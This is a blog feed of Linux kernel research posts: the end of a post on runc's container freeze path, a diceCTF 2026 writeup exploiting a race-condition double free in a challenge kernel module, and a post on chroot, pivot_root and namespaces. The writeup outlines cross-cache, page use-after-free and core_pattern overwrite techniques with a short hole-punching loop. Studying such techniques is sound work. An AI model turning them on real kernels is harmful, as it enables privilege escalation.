<p><code class="language-plaintext highlighter-rouge">Pause()</code> checks whether the container has been created or is still running, and then calls <code class="language-plaintext highlighter-rouge">c.cgroupManager.Freeze()</code> [2]. There are two cgroup versions: v1 and v2, so <code class="language-plaintext highlighter-rouge">c.cgroupManager</code> could be either version. Here, we’ll assume v2 is being used.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// libcontainer/container_linux.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Container</span><span class="p">)</span> <span class="n">Pause</span><span class="p">()</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">status</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">currentStatus</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="k">switch</span> <span class="n">status</span> <span class="p">{</span>
    <span class="k">case</span> <span class="n">Running</span><span class="p">,</span> <span class="n">Created</span><span class="o">:</span>
        <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cgroupManager</span><span class="o">.</span><span class="n">Freeze</span><span class="p">(</span><span class="n">cgroups</span><span class="o">.</span><span class="n">Frozen</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [2]</span>
            <span class="k">return</span> <span class="n">err</span>
        <span class="p">}</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Cgroup version 2, referred to as <code class="language-plaintext highlighter-rouge">cgroupv2</code> in the code, uses <code class="language-plaintext highlighter-rouge">fs2</code> as its filesystem manager, and the <code class="language-plaintext highlighter-rouge">Freeze()</code> handler in turn calls <code class="language-plaintext highlighter-rouge">setFreezer()</code> [3].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/cgroups/systemd/v2.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">UnifiedManager</span><span class="p">)</span> <span class="n">Freeze</span><span class="p">(</span><span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// m.fsMgr is assigned to 'fs2.NewManager(config, m.path)' in NewUnifiedManager()</span>
    <span class="k">return</span> <span class="n">m</span><span class="o">.</span><span class="n">fsMgr</span><span class="o">.</span><span class="n">Freeze</span><span class="p">(</span><span class="n">state</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// vendor/github.com/opencontainers/cgroups/fs2/fs2.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">m</span> <span class="o">*</span><span class="n">Manager</span><span class="p">)</span> <span class="n">Freeze</span><span class="p">(</span><span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">setFreezer</span><span class="p">(</span><span class="n">m</span><span class="o">.</span><span class="n">dirPath</span><span class="p">,</span> <span class="n">state</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [3]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The freezer modifies the pseudo-file <code class="language-plaintext highlighter-rouge">cgroup.freeze</code> [4, 5] to <strong>update the status of the associated container</strong>, causing it to be frozen.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// vendor/github.com/opencontainers/cgroups/fs2/freezer.go</span>
<span class="k">func</span> <span class="n">setFreezer</span><span class="p">(</span><span class="n">dirPath</span> <span class="kt">string</span><span class="p">,</span> <span class="n">state</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">FreezerState</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">fd</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cgroups</span><span class="o">.</span><span class="n">OpenFile</span><span class="p">(</span><span class="n">dirPath</span><span class="p">,</span> <span class="s">"cgroup.freeze"</span><span class="p">,</span> <span class="n">unix</span><span class="o">.</span><span class="n">O_RDWR</span><span class="p">)</span> <span class="c">// [4]</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">fd</span><span class="o">.</span><span class="n">WriteString</span><span class="p">(</span><span class="n">stateStr</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="6-summary">6. Summary</h2>

<p>The first post only focuses on the communication methods and the relationship between each component. In the next two posts, I will cover the attack surfaces and some past vulnerabilities, as well as the NVIDIA toolkit implementation.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[For this year’s (2026) Pwn2Own Berlin, I tried to find vulnerabilities in Docker but came up with nothing. This post simply documents my research on Docker’s system implementation, since it is quite interesting.]]></summary></entry><entry><title type="html">diceCTF 2026 - cornelslop</title><link href="https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop.html" rel="alternate" type="text/html" title="diceCTF 2026 - cornelslop" /><published>2026-03-09T00:00:00+00:00</published><updated>2026-03-09T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/03/09/dicectf-2026-corkelslop.html"><![CDATA[<p>This week I played diceCTF 2026 with team <strong>fewer</strong> and spent 12 hours solving a Linux kernel challenge, <strong>cornelslop</strong>. This post is a simple writeup without too much detail, and you can find the full exploit <a href="/assets/dicectf-2026-cornelslop-exp.c">here</a>.</p>

<h2 id="1-bug">1. Bug</h2>

<p>There is a <strong>race condition</strong> between <code class="language-plaintext highlighter-rouge">delete_entry()</code> and <code class="language-plaintext highlighter-rouge">check_entry()</code>.</p>

<p><code class="language-plaintext highlighter-rouge">check_entry()</code> [1] calls <code class="language-plaintext highlighter-rouge">xa_load()</code> to retrieve the entry without a spinlock or RCU lock, so it is possible that <strong>the entry has been deleted</strong> by <code class="language-plaintext highlighter-rouge">delete_entry()</code> in the meantime. Later, <code class="language-plaintext highlighter-rouge">destruct_entry()</code> [2] is called on the released object to <strong>free it a second time</strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">check_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">cornelslop_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">uint8_t</span> <span class="n">shash</span><span class="p">[</span><span class="n">SHA256_DIGEST_SIZE</span><span class="p">];</span>
    <span class="k">struct</span> <span class="n">cornelslop_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">xa_load</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cornelslop_xa</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="c1">// [...]</span>
    
    <span class="n">ret</span> <span class="o">=</span> <span class="n">sha256_va_range</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">va_end</span><span class="p">,</span> <span class="n">shash</span><span class="p">);</span>
    <span class="n">ue</span><span class="o">-&gt;</span><span class="n">corrupted</span> <span class="o">=</span> <span class="n">memcmp</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">shash</span><span class="p">,</span> <span class="n">shash</span><span class="p">,</span> <span class="n">SHA256_DIGEST_SIZE</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">corrupted</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">xa_erase</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cornelslop_xa</span><span class="p">,</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">id</span><span class="p">);</span>
        <span class="n">destruct_entry</span><span class="p">(</span><span class="n">e</span><span class="p">);</span> <span class="c1">// [2]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>

<span class="nl">finish:</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The flow to trigger UAF and double free is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Thread-1]                               [Thread-2]
delete_entry()                           check_entry()
                                          e = xa_load(&amp;cornelslop_xa, ue-&gt;id)
                                          sha256_va_range(e-&gt;va_start, e-&gt;va_end, shash)
                                           ...
 e = xa_erase(&amp;cornelslop_xa, ue-&gt;id)
 destruct_entry(e)
  call_rcu(&amp;e-&gt;rcu, destruct_entry_rcu)

[=== RCU ===]                             [=== context switch ===]
destruct_entry_rcu()
 kfree(e)
                                          access e &lt;--- UAF
                                          destruct_entry(e) &lt;--- double free
</code></pre></div></div>

<h2 id="2-problems">2. Problems</h2>

<h3 id="21-race-window--rcu">2.1. Race window &amp; RCU</h3>

<p>But the problem is that the RCU callback requires <strong>some time (RCU period)</strong> and a <strong>context switch once on each CPUs</strong> to be triggered, so <code class="language-plaintext highlighter-rouge">sha256_va_range()</code> has to run for a long time.</p>

<p>I used the <strong>shared memory trick</strong> to extend race window, and you can read <a href="https://faith2dxy.xyz/2025-11-28/extending_race_window_fallocate/">Faith’s post</a> for more details. The only difference is that the environment has no ramfs mountpoint, so I used <code class="language-plaintext highlighter-rouge">memfd_create</code> instead.</p>

<p>Internally, the shared memory page fault handler calls <code class="language-plaintext highlighter-rouge">shmem_falloc_wait()</code> to wait for hole punching, and it then calls <code class="language-plaintext highlighter-rouge">schedule()</code> [1] to perform a context switch, which also satisfies one of the conditions to trigger RCU callback.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="n">vm_fault_t</span> <span class="nf">shmem_falloc_wait</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_fault</span> <span class="o">*</span><span class="n">vmf</span><span class="p">,</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">shmem_falloc</span> <span class="o">&amp;&amp;</span>
        <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">waitq</span> <span class="o">&amp;&amp;</span>
        <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pgoff</span> <span class="o">&gt;=</span> <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">start</span> <span class="o">&amp;&amp;</span>
        <span class="n">vmf</span><span class="o">-&gt;</span><span class="n">pgoff</span> <span class="o">&lt;</span> <span class="n">shmem_falloc</span><span class="o">-&gt;</span><span class="n">next</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// [...]</span>
        <span class="n">prepare_to_wait</span><span class="p">(</span><span class="n">shmem_falloc_waitq</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">shmem_fault_wait</span><span class="p">,</span>
                <span class="n">TASK_UNINTERRUPTIBLE</span><span class="p">);</span>
        <span class="n">spin_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_lock</span><span class="p">);</span>
        <span class="n">schedule</span><span class="p">();</span> <span class="c1">// [1]</span>
        <span class="c1">// [...]</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="22-cross-the-cache">2.2. Cross the cache</h3>

<p>Even with a double free primitive, we can do nothing because entries are allocated from the specific cache <code class="language-plaintext highlighter-rouge">cornelslop_entry_cachep</code>. So the only way to exploit it is to <strong>perform a cross-cache attack</strong>.</p>

<p>We first allocate another entry to <strong>reclaim the freed object</strong>, and once the RCU callback is triggered, the object is released again. It allows us to <strong>hold a reference from the xarray to the UAF object</strong>.</p>

<p>To achieve the cross-cache attack, we have to spray lots of entries at the beginning, but due to <code class="language-plaintext highlighter-rouge">alloc_id()</code> range, we can only allocate entries up to <code class="language-plaintext highlighter-rouge">MAX_ENTRIES</code> (128), and it is totally insufficient.</p>

<p>Unlike <a href="https://kqx.io/writeups/cornelslop/#the-multicore-trick">kqx’s solution</a>, which leveraged the object releasing mechanism in a multicore environment, I chose a relatively stupid and brute-force way to spray entries.</p>

<p>We found that there is a <code class="language-plaintext highlighter-rouge">sha256_va_range()</code> [1] call between the entry allocation and <code class="language-plaintext highlighter-rouge">alloc_id()</code>. In theory, we can spawn thousands of threads and use the shared memory trick again to extend the race window. Each one allocates an entry and all of them are released after some time [2]. This allows us to allocate more than <code class="language-plaintext highlighter-rouge">MAX_ENTRIES</code> entries!</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">add_entry</span><span class="p">(</span><span class="k">struct</span> <span class="n">cornelslop_user_entry</span> <span class="o">*</span><span class="n">ue</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">cornelslop_entry</span> <span class="o">*</span><span class="n">e</span><span class="p">,</span> <span class="o">*</span><span class="n">old</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">id</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">ue</span><span class="o">-&gt;</span><span class="n">va_end</span> <span class="o">&lt;</span> <span class="n">ue</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

    <span class="n">e</span> <span class="o">=</span> <span class="n">kmem_cache_alloc</span><span class="p">(</span><span class="n">cornelslop_entry_cachep</span><span class="p">,</span> <span class="n">GFP_KERNEL</span> <span class="o">|</span> <span class="n">__GFP_ZERO</span><span class="p">);</span>
    <span class="c1">// [...]</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">sha256_va_range</span><span class="p">(</span><span class="n">e</span><span class="o">-&gt;</span><span class="n">va_start</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">va_end</span><span class="p">,</span> <span class="n">e</span><span class="o">-&gt;</span><span class="n">shash</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="c1">// [...]</span>
    <span class="n">id</span> <span class="o">=</span> <span class="n">alloc_id</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">id</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">ret</span> <span class="o">=</span> <span class="n">id</span><span class="p">;</span>
        <span class="k">goto</span> <span class="n">fail</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
<span class="nl">fail:</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">e</span><span class="p">);</span> <span class="c1">// [2]</span>
    <span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>But in fact, the number of entries is still not enough. The reason is that after the hole punch finishes, the CPU will not schedule automatically, and other threads are unable to be scheduled to call <code class="language-plaintext highlighter-rouge">add_entry()</code>.</p>

<p>How to solve it? One solution is to <strong>punch the hole again and again</strong>, and it works perfectly 🤣!</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">stop</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">usleep</span><span class="p">(</span><span class="mi">50</span><span class="p">);</span>
    <span class="n">SYSCHK</span><span class="p">(</span><span class="n">fallocate</span><span class="p">(</span><span class="n">memfd</span><span class="p">,</span> <span class="n">FALLOC_FL_PUNCH_HOLE</span> <span class="o">|</span> <span class="n">FALLOC_FL_KEEP_SIZE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MAX_LEN</span><span class="p">));</span>
<span class="p">}</span>
</code></pre></div></div>

<p>However, we cannot accurately control the order in which threads call <code class="language-plaintext highlighter-rouge">kfree(e)</code>, which makes it quite unstable.</p>

<p>Anyway, it works 😉.</p>

<h3 id="23-page-uaf">2.3. Page UAF</h3>

<p>After we return the slab containing the UAF object back to the buddy system, we allocate lots of <strong>pipe pages</strong> to reclaim it.</p>

<p>Remember we still have a reference to the UAF object? We then call <code class="language-plaintext highlighter-rouge">delete_entry()</code> on that entry, and <code class="language-plaintext highlighter-rouge">kfree()</code> is applied on one of the pipe pages. So now we have a <strong>page UAF</strong>!</p>

<p>The remaining steps are fairly straightforward: spraying page tables, reading the empty zero page PTE, calculating the core pattern PTE, hijacking the page table, overwriting the core pattern, and finally triggering a segfault to read the flag.</p>]]></content><author><name></name></author><category term="Linux" /><summary type="html"><![CDATA[This week I played diceCTF 2026 with team fewer and spent 12 hours solving a Linux kernel challenge, cornelslop. This post is a simple writeup without too much detail, and you can find the full exploit here.]]></summary></entry><entry><title type="html">Filesystem 102</title><link href="https://u1f383.github.io/linux/2026/03/04/filesystem-102.html" rel="alternate" type="text/html" title="Filesystem 102" /><published>2026-03-04T00:00:00+00:00</published><updated>2026-03-04T00:00:00+00:00</updated><id>https://u1f383.github.io/linux/2026/03/04/filesystem-102</id><content type="html" xml:base="https://u1f383.github.io/linux/2026/03/04/filesystem-102.html"><![CDATA[<p>In <a href="/linux/2026/02/26/filesystem-101.html">Filesystem 101</a>, we covered the structural relationships of the Linux filesystem from a process perspective. In this post, we continue analyzing how it interacts with other kernel subsystems.</p>

<h2 id="1-isolation">1. Isolation</h2>

<h3 id="11-chroot-chdir-and-pivot_root">1.1. chroot, chdir and pivot_root</h3>

<p>The kernel always call <code class="language-plaintext highlighter-rouge">path_openat()</code> to resolve pathname and obtain the corresponding <code class="language-plaintext highlighter-rouge">path</code> object. This function determines the lookup starting directory based on <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>, which is an <code class="language-plaintext highlighter-rouge">fs_struct</code> object containing the process’s <strong>current working path</strong> and <strong>root path</strong> information.</p>

<p>For example, if pathname starts with <code class="language-plaintext highlighter-rouge">"/"</code>, <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;root</code> is used; if pathname specifies <code class="language-plaintext highlighter-rouge">AT_FDCWD</code> as the directory file descriptor, <code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;cwd</code> is used.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">fs_struct</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">users</span><span class="p">;</span>
    <span class="n">seqlock_t</span> <span class="n">seq</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">umask</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">in_exec</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">path</span> <span class="n">root</span><span class="p">,</span> <span class="n">pwd</span><span class="p">;</span>
<span class="p">}</span> <span class="n">__randomize_layout</span><span class="p">;</span>
</code></pre></div></div>

<p>There are some syscalls able to configure these directories information: <code class="language-plaintext highlighter-rouge">chroot</code>, <code class="language-plaintext highlighter-rouge">chdir</code> and <code class="language-plaintext highlighter-rouge">pivot_root</code>.</p>

<p>The syscall <code class="language-plaintext highlighter-rouge">chroot</code> simply resolves the provided pathname and updates <strong><code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;root</code></strong>, but it requires the process to have the <strong><code class="language-plaintext highlighter-rouge">CAP_SYS_CHROOT</code> capability</strong> in its user namespace.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chroot(filename)
=&gt; user_path_at(AT_FDCWD, filename, lookup_flags, &amp;path)
=&gt; check ns_capable(current_user_ns(), CAP_SYS_CHROOT)
=&gt; set_fs_root(current-&gt;fs, &amp;path)
  =&gt; fs-&gt;root = *path
</code></pre></div></div>

<p>The syscall <code class="language-plaintext highlighter-rouge">chdir</code> resolves pathname and updates the working directory, <strong><code class="language-plaintext highlighter-rouge">current-&gt;fs-&gt;pwd</code></strong>. Unlike <code class="language-plaintext highlighter-rouge">chroot</code>, it requires no capability.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_chroot(filename)
=&gt; user_path_at(AT_FDCWD, filename, lookup_flags, &amp;path)
=&gt; set_fs_pwd(current-&gt;fs, &amp;path)
  =&gt; fs-&gt;pwd = *path
</code></pre></div></div>

<p>The syscall <code class="language-plaintext highlighter-rouge">pivot_root</code> is the most complicated one. It is used to update the <strong>entire mount system</strong> rather than only the root directory or working directory. It requires the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability and performs a lot of checks before updating. After these checks, it iterates over all processes and threads, finds those tasks whose <strong>working directory or root directory matches the old ones</strong>, and updates them to the new ones.</p>

<p>The whole process not only updates <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>, but also involves <strong>mount point validation</strong> and <strong>namespace handling</strong>. Therefore, when setting up containers, <code class="language-plaintext highlighter-rouge">pivot_root</code> should be used to properly isolate execution environments.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_pivot_root(new_root, put_old)
=&gt; may_mount()
  =&gt; ns_capable(current-&gt;nsproxy-&gt;mnt_ns-&gt;user_ns, CAP_SYS_ADMIN)

=&gt; user_path_at(AT_FDCWD, new_root, LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &amp;new)
=&gt; user_path_at(AT_FDCWD, put_old, LOOKUP_FOLLOW | LOOKUP_DIRECTORY, &amp;old)
=&gt; get_fs_root(current-&gt;fs, &amp;root)
=&gt; ... lots of check

=&gt; chroot_fs_refs(&amp;root, &amp;new)
  =&gt; iterate all process and thread
    =&gt; fs = p-&gt;fs
    
    =&gt; replace_path(&amp;fs-&gt;root, old_root, new_root)
      =&gt; if fs-&gt;root == old_root
        =&gt; fs-&gt;root = new_root
    
    =&gt; replace_path(&amp;fs-&gt;pwd, old_root, new_root)
</code></pre></div></div>

<h3 id="12-clone_fs-and-clone_newns">1.2. CLONE_FS and CLONE_NEWNS</h3>

<p>The kernel supports the system calls <code class="language-plaintext highlighter-rouge">unshare</code> and <code class="language-plaintext highlighter-rouge">clone</code> to create namespaces, isolating processes in different execution environments. In this post, we only discuss the <code class="language-plaintext highlighter-rouge">unshare</code> case, as the <code class="language-plaintext highlighter-rouge">clone</code> operation is largely similar.</p>

<p>The goal of the <code class="language-plaintext highlighter-rouge">unshare</code> syscall is to create a <strong>namespace proxy</strong> for a process. The namespace proxy is then installed with newly created namespaces. The simplified call trace is shown below; only function calls relevant to the later discussion are included.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__do_sys_unshare(unshare_flags)
=&gt; ksys_unshare(unshare_flags)
  =&gt; unshare_fs(unshare_flags, &amp;new_fs)
  =&gt; ...
  
  =&gt; unshare_nsproxy_namespaces(unshare_flags, &amp;new_nsproxy, new_cred, new_fs)
    =&gt; create_new_namespaces(unshare_flags, current, user_ns, new_fs ? new_fs : current-&gt;fs)
      =&gt; new_nsp = create_nsproxy()
      =&gt; new_nsp-&gt;mnt_ns = copy_mnt_ns(flags, tsk-&gt;nsproxy-&gt;mnt_ns, user_ns, new_fs)
      =&gt; ...
  
  =&gt; switch_task_namespaces(current, new_nsproxy)
    =&gt; p-&gt;nsproxy = new
</code></pre></div></div>

<p>Among all flags, two are directly related to the filesystem.</p>

<p>The first is <strong><code class="language-plaintext highlighter-rouge">CLONE_FS</code></strong>, It is used to <strong>duplicate the current <code class="language-plaintext highlighter-rouge">fs_struct</code> object (<code class="language-plaintext highlighter-rouge">current-&gt;fs</code>)</strong> so that updates to the root directory and the working directory can be performed without affecting other processes.</p>

<p><code class="language-plaintext highlighter-rouge">unshare_fs()</code> is called during the unsharing process. It creates a new <code class="language-plaintext highlighter-rouge">fs_struct</code> object, and all subsequent filesystem updates are performed on this new object instead of <code class="language-plaintext highlighter-rouge">current-&gt;fs</code>. Finally, if all operations complete successfully, <code class="language-plaintext highlighter-rouge">current-&gt;fs</code> is replaced with the new instance.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>unshare(unshare_flags)
=&gt; ...
=&gt; unshare_fs(unshare_flags, new_fsp)
  =&gt; *new_fsp = copy_fs_struct(fs)
    =&gt; fs = kmem_cache_alloc(fs_cachep)
    =&gt; fs-&gt;root = old-&gt;root
    =&gt; fs-&gt;pwd = old-&gt;pwd
=&gt; ...
=&gt; current-&gt;fs = new_fs
</code></pre></div></div>

<p>The second flag is <strong><code class="language-plaintext highlighter-rouge">CLONE_NEWNS</code></strong>. It is used to create a <strong>new mount namespace</strong>, allowing the process to have a private copy of the current filesystem that is not shared with other processes.</p>

<p>Internally, <code class="language-plaintext highlighter-rouge">copy_mnt_ns()</code> creates a new mount namespace (<code class="language-plaintext highlighter-rouge">new_ns</code>), duplicates the current filesystem tree from the root as a private tree, and then binds the new root to the newly created mount namespace object. It also needs to <strong>update <code class="language-plaintext highlighter-rouge">fs-&gt;root</code> and <code class="language-plaintext highlighter-rouge">fs-&gt;pwd</code></strong> so that they point to the new tree; otherwise, filesystem isolation would be broken.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>create_new_namespaces(flags, tsk, user_ns, new_fs)
=&gt; new_nsp = create_nsproxy()
=&gt; new_nsp-&gt;mnt_ns = copy_mnt_ns(flags, tsk-&gt;nsproxy-&gt;mnt_ns, user_ns, new_fs)
  =&gt; old = ns-&gt;root
  =&gt; new_ns = alloc_mnt_ns(user_ns, false)
  =&gt; new = copy_tree(old, old-&gt;mnt.mnt_root, copy_flags)
  =&gt; new_ns-&gt;root = new
  
  =&gt; traverse the trees
    =&gt; if (&amp;p-&gt;mnt == new_fs-&gt;root.mnt)
      =&gt; new_fs-&gt;root.mnt = mntget(&amp;q-&gt;mnt)
    =&gt; if (&amp;p-&gt;mnt == new_fs-&gt;pwd.mnt)
      =&gt; new_fs-&gt;pwd.mnt = mntget(&amp;q-&gt;mnt)
</code></pre></div></div>

<h2 id="2-permission-model">2. Permission Model</h2>

<h3 id="21-operation-check">2.1. Operation Check</h3>

<p>Before performing file-related operations, the kernel always call functions following the <strong><code class="language-plaintext highlighter-rouge">may_XXX()</code> naming convention</strong> to verify <strong>whether a process has sufficient permissions</strong>.</p>

<p>For example, since mounting may affect the entire system, the process is required to have the <code class="language-plaintext highlighter-rouge">CAP_SYS_ADMIN</code> capability in the corresponding user namespace. This check is performed by <strong><code class="language-plaintext highlighter-rouge">may_mount()</code></strong>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">bool</span> <span class="nf">may_mount</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">return</span> <span class="n">ns_capable</span><span class="p">(</span><span class="n">current</span><span class="o">-&gt;</span><span class="n">nsproxy</span><span class="o">-&gt;</span><span class="n">mnt_ns</span><span class="o">-&gt;</span><span class="n">user_ns</span><span class="p">,</span> <span class="n">CAP_SYS_ADMIN</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Opening files is a more common case. Before reading, writing or executing a file, <strong><code class="language-plaintext highlighter-rouge">may_open()</code></strong> is invoked to check if the process has the required <strong>access permissions</strong>. The key function responsible for permission checking is <code class="language-plaintext highlighter-rouge">acl_permission_check()</code>.</p>

<p>It first retrieves the file mode from <strong><code class="language-plaintext highlighter-rouge">inode-&gt;i_mode</code></strong>, which corresponds to the permission bits (e.g., <code class="language-plaintext highlighter-rouge">-rw-r--r--</code>) shown in the output of the <code class="language-plaintext highlighter-rouge">ls -al</code> command. This value defines which users are allowed to access the file and with what permissions.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>may_open(idmap, path, acc_mode, flag)
=&gt; inode_permission(idmap, inode, MAY_OPEN | acc_mode)
  =&gt; do_inode_permission(idmap, inode, mask)
    =&gt; generic_permission(idmap, inode, mask)
      =&gt; acl_permission_check(idmap, inode, mask)
        =&gt; mode = inode-&gt;i_mode
        =&gt; vfsuid = i_uid_into_vfsuid(idmap, inode)
        =&gt; ... check
        =&gt; vfsgid = i_gid_into_vfsgid(idmap, inode)
        =&gt; ... check
</code></pre></div></div>

<p>It looks very straightforward: retrieving the access mode and checking the identifiers against that mode.</p>

<p>But what are <code class="language-plaintext highlighter-rouge">i_uid_into_vfsuid()</code> and <code class="language-plaintext highlighter-rouge">i_gid_into_vfsgid()</code>? What is the difference between a UID (<code class="language-plaintext highlighter-rouge">uid</code>) and a VFS UID (<code class="language-plaintext highlighter-rouge">vfsuid</code>)?</p>

